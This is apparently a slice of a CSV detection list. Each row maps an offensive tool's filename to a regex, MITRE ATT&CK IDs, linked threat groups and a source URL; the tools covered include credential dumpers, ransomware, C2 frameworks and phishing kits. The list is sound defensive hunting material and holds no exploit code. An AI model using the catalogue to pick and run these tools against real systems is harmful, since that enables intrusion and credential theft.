"*/google_drive_doubledrive.py*",".{0,1000}\/google_drive_doubledrive\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","7580"
"*/goPassGen.git*",".{0,1000}\/goPassGen\.git.{0,1000}","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tool","https://github.com/bigb0sss/goPassGen","1","1","N/A","N/A","8","1","21","1","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z","7581"
"*/Gopher.exe*",".{0,1000}\/Gopher\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","7582"
"*/gopher-ls.nse*",".{0,1000}\/gopher\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7583"
"*/gophish.db*",".{0,1000}\/gophish\.db.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/Evilginx-Phishing-Infra-Setup","1","0","#linux","N/A","10","4","391","67","2024-12-12T04:13:02Z","2024-06-08T10:19:45Z","7584"
"*/gophish.db*",".{0,1000}\/gophish\.db.{0,1000}","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/gophish/gophish","1","1","N/A","N/A","10","10","12483","2528","2024-09-23T04:24:43Z","2013-11-18T23:26:43Z","7585"
"*/gophish/*",".{0,1000}\/gophish\/.{0,1000}","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/gophish/gophish","1","1","N/A","N/A","10","10","12483","2528","2024-09-23T04:24:43Z","2013-11-18T23:26:43Z","7586"
"*/gophish_admin.crt*",".{0,1000}\/gophish_admin\.crt.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/Evilginx-Phishing-Infra-Setup","1","0","#linux","N/A","10","4","391","67","2024-12-12T04:13:02Z","2024-06-08T10:19:45Z","7587"
"*/gophish_admin.key*",".{0,1000}\/gophish_admin\.key.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/Evilginx-Phishing-Infra-Setup","1","0","#linux","N/A","10","4","391","67","2024-12-12T04:13:02Z","2024-06-08T10:19:45Z","7588"
"*/gorsair.go*",".{0,1000}\/gorsair\.go.{0,1000}","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tool","https://github.com/Ullaakut/Gorsair","1","1","N/A","N/A","N/A","9","851","70","2023-12-19T18:44:32Z","2018-08-02T16:49:14Z","7589"
"*/go-secdump.git*",".{0,1000}\/go\-secdump\.git.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","N/A","10","5","457","51","2025-02-21T19:16:11Z","2023-02-23T17:02:50Z","7590"
"*/gosecretsdump*",".{0,1000}\/gosecretsdump.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","7591"
"*/gosecretsdump.*",".{0,1000}\/gosecretsdump\..{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","7592"
"*/gosecretsdump/*",".{0,1000}\/gosecretsdump\/.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","7593"
"*/gosecretsdump_linux*",".{0,1000}\/gosecretsdump_linux.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","#linux","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","7594"
"*/gosecretsdump_mac*",".{0,1000}\/gosecretsdump_mac.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","7595"
"*/gosecretsdump_win*",".{0,1000}\/gosecretsdump_win.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","7596"
"*/GoStompy.go*",".{0,1000}\/GoStompy\.go.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","7600"
"*/Gotato.git*",".{0,1000}\/Gotato\.git.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","7601"
"*/gotato.go*",".{0,1000}\/gotato\.go.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","7602"
"*/goWMIExec.git*",".{0,1000}\/goWMIExec\.git.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","7604"
"*/goWMIExec_linux_*",".{0,1000}\/goWMIExec_linux_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","#linux","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","7605"
"*/goWMIExec_mac_*",".{0,1000}\/goWMIExec_mac_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","7606"
"*/goWMIExec_win_*",".{0,1000}\/goWMIExec_win_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","7607"
"*/goZulipC2.git*",".{0,1000}\/goZulipC2\.git.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","N/A","10","","N/A","","","","7608"
"*/GPOBrowser.py*",".{0,1000}\/GPOBrowser\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","1","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","7609"
"*/GPOddity.git*",".{0,1000}\/GPOddity\.git.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","7610"
"*/GPOddity/*",".{0,1000}\/GPOddity\/.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","7611"
"*/gpp_autologin.py*",".{0,1000}\/gpp_autologin\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","7612"
"*/gpp_password.py*",".{0,1000}\/gpp_password\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","7613"
"*/gpp-decrypt*",".{0,1000}\/gpp\-decrypt.{0,1000}","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A","7614"
"*/gpsd-info.nse*",".{0,1000}\/gpsd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7615"
"*/grabchrome.exe*",".{0,1000}\/grabchrome\.exe.{0,1000}","offensive_tool_keyword","GrabChrome","HelloKitty Grabber used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","7616"
"*/Graphpython.git*",".{0,1000}\/Graphpython\.git.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","7617"
"*/Graphpython.py*",".{0,1000}\/Graphpython\.py.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","7618"
"*/GraphRunner.git*",".{0,1000}\/GraphRunner\.git.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","1","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","7619"
"*/GraphRunner.ps1*",".{0,1000}\/GraphRunner\.ps1.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","1","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","7620"
"*/GraphRunner-main*",".{0,1000}\/GraphRunner\-main.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","1","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","7621"
"*/GraphSpy.git*",".{0,1000}\/GraphSpy\.git.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","1","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","7622"
"*/GraphSpy.py*",".{0,1000}\/GraphSpy\.py.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","1","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","7623"
"*/GraphStrike.cna*",".{0,1000}\/GraphStrike\.cna.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","7624"
"*/GraphStrike.git*",".{0,1000}\/GraphStrike\.git.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","7625"
"*/graphstrike.profile*",".{0,1000}\/graphstrike\.profile.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","7626"
"*/GraphStrike.py*",".{0,1000}\/GraphStrike\.py.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","7627"
"*/GraphStrike-main/*",".{0,1000}\/GraphStrike\-main\/.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","7628"
"*/GreameRAT.exe*",".{0,1000}\/GreameRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7629"
"*/GreatSCT/*",".{0,1000}\/GreatSCT\/.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","7630"
"*/GreatSCT/GreatSCT*",".{0,1000}\/GreatSCT\/GreatSCT.{0,1000}","offensive_tool_keyword","GreatSCT","GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. GreatSCT is current under support by @ConsciousHacker","T1027 - T1055 - T1566 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GreatSCT/GreatSCT","1","0","#linux","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","7631"
"*/greatsct-output*",".{0,1000}\/greatsct\-output.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","7632"
"*/Group3r.exe*",".{0,1000}\/Group3r\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","7633"
"*/Group3r.exe*",".{0,1000}\/Group3r\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","7634"
"*/Group3r.exe*",".{0,1000}\/Group3r\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","7635"
"*/Group3r.git*",".{0,1000}\/Group3r\.git.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","7636"
"*/Group3r/releases/download/*",".{0,1000}\/Group3r\/releases\/download\/.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","7637"
"*/Grouper2.exe*",".{0,1000}\/Grouper2\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","7638"
"*/Grouper2.exe*",".{0,1000}\/Grouper2\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","7639"
"*/GruntHTTP.exe*",".{0,1000}\/GruntHTTP\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","7640"
"*/gsecdump-*.exe*",".{0,1000}\/gsecdump\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","7641"
"*/gsecdump.exe*",".{0,1000}\/gsecdump\.exe.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","7642"
"*/gs-netcat ",".{0,1000}\/gs\-netcat\s","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7643"
"*/gsocket-*.tar.gz*",".{0,1000}\/gsocket\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7644"
"*/gsocket.1*",".{0,1000}\/gsocket\.1.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7645"
"*/gsocket.git*",".{0,1000}\/gsocket\.git.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7646"
